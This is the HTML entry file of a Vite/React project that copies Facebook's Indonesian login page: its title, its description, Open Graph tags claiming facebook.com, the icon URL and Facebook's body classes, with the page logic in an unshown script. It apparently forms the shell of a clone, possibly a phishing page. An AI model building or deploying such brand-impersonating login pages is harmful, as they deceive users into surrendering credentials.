<!DOCTYPE html>
<html id="facebook" class="tinyViewport tinyWidth" lang="id">
  <head>
    <meta charset="UTF-8" />
    <link rel="icon" type="image/svg+xml" href="/vite.svg" />
    <meta name="viewport" content="width=device-width, initial-scale=1.0" />
    <title id="pageTitle">Facebook - Masuk atau Daftar</title>
    <meta property="og:site_name" content="Facebook">
    <meta property="og:url" content="https://www.facebook.com/">
    <meta property="og:image" content="https://www.facebook.com/images/fb_icon_325x325.png">
    <meta name="description" content="Login ke Facebook untuk mulai membagikan sesuatu dan berhubungan dengan teman, keluarga, dan orang-orang yang Anda kenal.">
  </head>
  <body class="fbIndex UIPage_LoggedOut _-kb sf _605a b_c3pyn-ahh gecko mac x1 Locale_id_ID cores-lt4 _19_u" dir="ltr">
    <div className="_li" id="u_0_1_6R"></div>
    <script type="module" src="/src/main.jsx"></script>
  </body>
</html>
